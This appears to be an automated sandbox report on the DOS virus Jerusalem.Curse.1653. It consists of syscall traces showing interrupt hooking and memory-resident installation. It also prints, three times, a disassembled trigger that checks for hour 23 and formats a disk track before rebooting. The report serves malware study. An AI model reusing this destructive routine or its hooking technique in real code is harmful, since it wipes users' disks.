Sample viewer

vx.netlux.org/Virus.DOS.Jerusalem.Curse.1653.c

Syscalls:

Time Syscall Op Syscall Name
2018-12-17T22:41:40.390221775Z 240 PC: 12ada | UNKNOWN!
2018-12-17T22:41:40.392621062Z 240 PC: 12b05 | UNKNOWN!
2018-12-17T22:41:40.394118287Z 74 PC: 12b88 | Reallocate memory
2018-12-17T22:41:40.395877738Z 53 PC: 12b8d | Get interrupt vector (Interrupt = '33' AKA 'Random read')
2018-12-17T22:41:40.398726299Z 37 PC: 12ba1 | Set interrupt vector (Interrupt = '33' AKA 'Random read')
2018-12-17T22:41:40.400743003Z 44 PC: 12bde | Get time
0x12bde: cmp ch, 0x17
0x12be1: jne 0x12c0d
0x12be3: mov ah, 0x19
0x12be5: int 0x21
0x12be7: mov dl, al
0x12be9: cmp dl, 2
0x12bec: jb 0x12bf1
0x12bee: add dl, 0x7e
0x12bf1: mov ax, 0x509
0x12bf4: xor cx, cx
0x12bf6: inc cl
0x12bf8: xor dh, dh
0x12bfa: lea bx, word ptr [0x1c5]
0x12bfe: int 0x13
0x12c00: ljmp 0xf000:0xfff0
0x12c05: add byte ptr [bx + si], al
0x12c07: add word ptr [bp + si], ax
0x12c09: nop
0x12c0a: nop
0x12c0b: nop
2018-12-17T22:41:40.403976137Z 75 PC: 12c19 | Execute program
2018-12-17T22:41:40.42027209Z 73 PC: 12c1f | Release memory
2018-12-17T22:41:40.421970557Z 77 PC: 12c23 | Get program return code
2018-12-17T22:41:40.423597245Z 49 PC: 12c31 | Terminate and stay resident (Return code = '0' | Memory size = '119')

{"DateBased":false,"Day":0,"Month":0,"Year":0,"Hour":0,"Min":0,"Second":0,"TimeBased":true,"OriginalID":7301,"SideJobID":0}

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:01:19.493762281Z 240 PC: 12ada | UNKNOWN!
2018-12-25T12:01:19.495242091Z 240 PC: 12b05 | UNKNOWN!
2018-12-25T12:01:19.496260189Z 74 PC: 12b88 | Reallocate memory
2018-12-25T12:01:19.497505235Z 53 PC: 12b8d | Get interrupt vector (Interrupt = '33' AKA 'Random read')
2018-12-25T12:01:19.499732279Z 37 PC: 12ba1 | Set interrupt vector (Interrupt = '33' AKA 'Random read')
2018-12-25T12:01:19.50127263Z 44 PC: 12bde | Get time
0x12bde: cmp ch, 0x17
0x12be1: jne 0x12c0d
0x12be3: mov ah, 0x19
0x12be5: int 0x21
0x12be7: mov dl, al
0x12be9: cmp dl, 2
0x12bec: jb 0x12bf1
0x12bee: add dl, 0x7e
0x12bf1: mov ax, 0x509
0x12bf4: xor cx, cx
0x12bf6: inc cl
0x12bf8: xor dh, dh
0x12bfa: lea bx, word ptr [0x1c5]
0x12bfe: int 0x13
0x12c00: ljmp 0xf000:0xfff0
0x12c05: add byte ptr [bx + si], al
0x12c07: add word ptr [bp + si], ax
0x12c09: nop
0x12c0a: nop
0x12c0b: nop
2018-12-25T12:01:19.503551551Z 75 PC: 12c19 | Execute program
2018-12-25T12:01:19.522831026Z 73 PC: 12c1f | Release memory
2018-12-25T12:01:19.524416184Z 77 PC: 12c23 | Get program return code
2018-12-25T12:01:19.525807641Z 49 PC: 12c31 | Terminate and stay resident (Return code = '0' | Memory size = '119')

{"DateBased":false,"Day":0,"Month":0,"Year":0,"Hour":23,"Min":0,"Second":0,"TimeBased":true,"OriginalID":7301,"SideJobID":0}

Syscalls:

Time Syscall Op Syscall Name
2018-12-25T12:01:19.918929969Z 240 PC: 12ada | UNKNOWN!
2018-12-25T12:01:19.938932867Z 240 PC: 12b05 | UNKNOWN!
2018-12-25T12:01:19.940592451Z 74 PC: 12b88 | Reallocate memory
2018-12-25T12:01:19.942324561Z 53 PC: 12b8d | Get interrupt vector (Interrupt = '33' AKA 'Random read')
2018-12-25T12:01:19.944122711Z 37 PC: 12ba1 | Set interrupt vector (Interrupt = '33' AKA 'Random read')
2018-12-25T12:01:19.94985298Z 44 PC: 12bde | Get time
0x12bde: cmp ch, 0x17
0x12be1: jne 0x12c0d
0x12be3: mov ah, 0x19
0x12be5: int 0x21
0x12be7: mov dl, al
0x12be9: cmp dl, 2
0x12bec: jb 0x12bf1
0x12bee: add dl, 0x7e
0x12bf1: mov ax, 0x509
0x12bf4: xor cx, cx
0x12bf6: inc cl
0x12bf8: xor dh, dh
0x12bfa: lea bx, word ptr [0x1c5]
0x12bfe: int 0x13
0x12c00: ljmp 0xf000:0xfff0
0x12c05: add byte ptr [bx + si], al
0x12c07: add word ptr [bp + si], ax
0x12c09: nop
0x12c0a: nop
0x12c0b: nop
2018-12-25T12:01:19.952676478Z 25 PC: 12be7 | Get default drive
2018-12-25T12:01:22.165595047Z 72 PC: 8f1b9 | Allocate memory
2018-12-25T12:01:22.168575285Z 72 PC: 8f1bd | Allocate memory
2018-12-25T12:01:22.171470527Z 99 PC: 90858 | Get DBCS lead byte table pointer
2018-12-25T12:01:22.175060564Z 61 PC: 91f88 | Open file (Filename = 'C:\WINDOWS\HIMEM.SYS')
2018-12-25T12:01:22.186493795Z 66 PC: 91f95 | Move file pointer
2018-12-25T12:01:22.188586991Z 62 PC: 91fc1 | Close file
2018-12-25T12:01:22.191971421Z 75 PC: 91fe0 | Execute program
2018-12-25T12:01:22.211865942Z 98 PC: 916f1 | Get current PSP
2018-12-25T12:01:22.213188726Z 9 PC: c605 | Display string (String= '6��r�&;] u')
2018-12-25T12:01:22.217867152Z 48 PC: c609 | Get DOS version
2018-12-25T12:01:22.22295557Z 9 PC: c382 | Display string (String= ' Installed A20 handler number ')
2018-12-25T12:01:22.226071289Z 2 PC: c38c | Character output (Char = '32')
2018-12-25T12:01:22.229572742Z 2 PC: c3a7 | Character output (Char = '2e')
2018-12-25T12:01:22.234514481Z 9 PC: c6d9 | Display string (String= '�����VH�VD���V@��������������_���Ku��t1��������D�����t �� ��������a1��Z�����W���� ������5���|�����(���������Nj�(��������p�^')
2018-12-25T12:01:22.238833609Z 9 PC: c6e0 | Display string (String= '�5���|�����(���������Nj�(��������p�^')
2018-12-25T12:01:22.24369045Z 61 PC: 91f88 | Open file (See above)
2018-12-25T12:01:22.255057069Z 66 PC: 91f95 | Move file pointer (See above)
2018-12-25T12:01:22.256700744Z 62 PC: 91fc1 | Close file (See above)
2018-12-25T12:01:22.258703633Z 75 PC: 91fe0 | Execute program (See above)
2018-12-25T12:01:22.282847605Z 98 PC: 916f1 | Get current PSP (See above)
2018-12-25T12:01:22.288552736Z 82 PC: 13d46 | Get DOS internal pointers (SYSVARS)
2018-12-25T12:01:22.290779633Z 53 PC: 13ac3 | Get interrupt vector (Interrupt = '19' AKA 'Delete file')
2018-12-25T12:01:22.292146734Z 37 PC: 13ad6 | Set interrupt vector (Interrupt = '19' AKA 'Delete file')
2018-12-25T12:01:22.294215322Z 53 PC: 13ae0 | Get interrupt vector (Interrupt = '47' AKA 'Get disk transfer address')
2018-12-25T12:01:22.295619524Z 37 PC: 13af3 | Set interrupt vector (Interrupt = '47' AKA 'Get disk transfer address')
2018-12-25T12:01:22.296913408Z 9 PC: 13a0d | Display string (Could not find end pointer)
2018-12-25T12:01:22.305737897Z 62 PC: 8f8eb | Close file
2018-12-25T12:01:22.30759278Z 62 PC: 8f8f2 | Close file
2018-12-25T12:01:22.309264045Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T12:01:22.311544448Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T12:01:22.313275327Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T12:01:22.315057731Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T12:01:22.316854819Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T12:01:22.318537679Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T12:01:22.320042118Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T12:01:22.321586451Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T12:01:22.323425071Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T12:01:22.325091189Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T12:01:22.326726863Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T12:01:22.329133996Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T12:01:22.330646764Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T12:01:22.332118585Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T12:01:22.339907249Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T12:01:22.341462145Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T12:01:22.342902221Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T12:01:22.345599767Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T12:01:22.347510066Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T12:01:22.349286105Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T12:01:22.351848185Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T12:01:22.353781104Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T12:01:22.355489098Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T12:01:22.357271893Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T12:01:22.359450881Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T12:01:22.361443984Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T12:01:22.363408837Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T12:01:22.365308598Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T12:01:22.366751521Z 62 PC: 8f8f2 | Close file (See above)
2018-12-25T12:01:22.36822014Z 61 PC: 8f8ff | Open file (Filename = '')
2018-12-25T12:01:22.374148237Z 62 PC: 8f90e | Close file
2018-12-25T12:01:22.375872017Z 69 PC: 8f915 | Duplicate handle
2018-12-25T12:01:22.37824256Z 69 PC: 8f919 | Duplicate handle
2018-12-25T12:01:22.380459841Z 61 PC: 9387b | Open file (Filename = '')
2018-12-25T12:01:22.385640777Z 68 PC: 9386b | I/O control for devices (Set for = '')
2018-12-25T12:01:22.387163505Z 61 PC: 9387b | Open file (See above)
2018-12-25T12:01:22.392383887Z 68 PC: 9386b | I/O control for devices (See above)
2018-12-25T12:01:22.394518291Z 74 PC: 8f9c4 | Reallocate memory
2018-12-25T12:01:22.39641209Z 72 PC: 8f9e0 | Allocate memory
2018-12-25T12:01:22.398797634Z 72 PC: 8f9e4 | Allocate memory
2018-12-25T12:01:22.400376833Z 74 PC: 8f9fb | Reallocate memory
2018-12-25T12:01:22.401945658Z 72 PC: 8fa02 | Allocate memory
2018-12-25T12:01:22.404319681Z 72 PC: 8fa06 | Allocate memory
2018-12-25T12:01:22.406339995Z 73 PC: 8fa11 | Release memory
2018-12-25T12:01:22.408398943Z 73 PC: 8efea | Release memory
2018-12-25T12:01:22.41073081Z 74 PC: 8f003 | Reallocate memory
2018-12-25T12:01:22.412698872Z 72 PC: 8f054 | Allocate memory
2018-12-25T12:01:22.414637387Z 72 PC: 8f058 | Allocate memory
2018-12-25T12:01:22.416727614Z 73 PC: 8f060 | Release memory
2018-12-25T12:01:22.418235096Z 61 PC: 8f080 | Open file (Filename = '')
2018-12-25T12:01:22.428163634Z 63 PC: 8f095 | Read file or device (Read 4 bytes on handle 5)
2018-12-25T12:01:22.434661986Z 66 PC: 8f0ad | Move file pointer
2018-12-25T12:01:22.436305333Z 62 PC: 8f0d1 | Close file
2018-12-25T12:01:22.438219392Z 75 PC: 8f0f2 | Execute program
2018-12-25T12:01:22.463529608Z 80 PC: 12be9 | Set current PSP
2018-12-25T12:01:22.464865826Z 48 PC: 12bee | Get DOS version
2018-12-25T12:01:22.466600936Z 99 PC: 193d0 | Get DBCS lead byte table pointer
2018-12-25T12:01:22.469122139Z 101 PC: 12c74 | Get extended country info
2018-12-25T12:01:22.471231173Z 99 PC: 12c7a | Get DBCS lead byte table pointer
2018-12-25T12:01:22.472940514Z 74 PC: 12cdc | Reallocate memory
2018-12-25T12:01:22.474942134Z 72 PC: 1355d | Allocate memory
2018-12-25T12:01:22.477593069Z 25 PC: 13596 | Get default drive
2018-12-25T12:01:22.479125447Z 71 PC: 135ad | Get current directory
2018-12-25T12:01:22.482088125Z 59 PC: 135ba | Change current directory
2018-12-25T12:01:22.489028558Z 59 PC: 135c8 | Change current directory
2018-12-25T12:01:22.495223357Z 59 PC: 135d3 | Change current directory
2018-12-25T12:01:22.498961988Z 25 PC: 12d13 | Get default drive
2018-12-25T12:01:22.500747543Z 37 PC: 127d3 | Set interrupt vector (Interrupt = '34' AKA 'Random write')
2018-12-25T12:01:22.50191227Z 37 PC: 127da | Set interrupt vector (Interrupt = '35' AKA 'Get file size in records')
2018-12-25T12:01:22.503004346Z 37 PC: 127e1 | Set interrupt vector (Interrupt = '36' AKA 'Set random record number')
2018-12-25T12:01:22.505892859Z 80 PC: 1301d | Set current PSP
2018-12-25T12:01:22.506706762Z 37 PC: 13041 | Set interrupt vector (Interrupt = '46' AKA 'Set verify flag')
2018-12-25T12:01:22.507788088Z 53 PC: 13362 | Get interrupt vector (Interrupt = '47' AKA 'Get disk transfer address')
2018-12-25T12:01:22.512482424Z 37 PC: 13383 | Set interrupt vector (Interrupt = '47' AKA 'Get disk transfer address')
2018-12-25T12:01:22.513688018Z 51 PC: 13417 | Get or set Ctrl-Break
2018-12-25T12:01:22.515742093Z 72 PC: 130ec | Allocate memory
2018-12-25T12:01:22.517728824Z 61 PC: 131b2 | Open file (Filename = '')
2018-12-25T12:01:22.525508793Z 62 PC: 131ba | Close file
2018-12-25T12:01:22.527592154Z 51 PC: 1344c | Get or set Ctrl-Break
2018-12-25T12:01:22.528669736Z 74 PC: 1197c | Reallocate memory
2018-12-25T12:01:22.530281356Z 72 PC: 11991 | Allocate memory
2018-12-25T12:01:22.531892939Z 73 PC: 119b2 | Release memory
2018-12-25T12:01:22.533297878Z 72 PC: 119bd | Allocate memory
2018-12-25T12:01:22.535396119Z 73 PC: 119df | Release memory
2018-12-25T12:01:22.536519755Z 72 PC: 119f5 | Allocate memory
2018-12-25T12:01:22.538097312Z 72 PC: 119fd | Allocate memory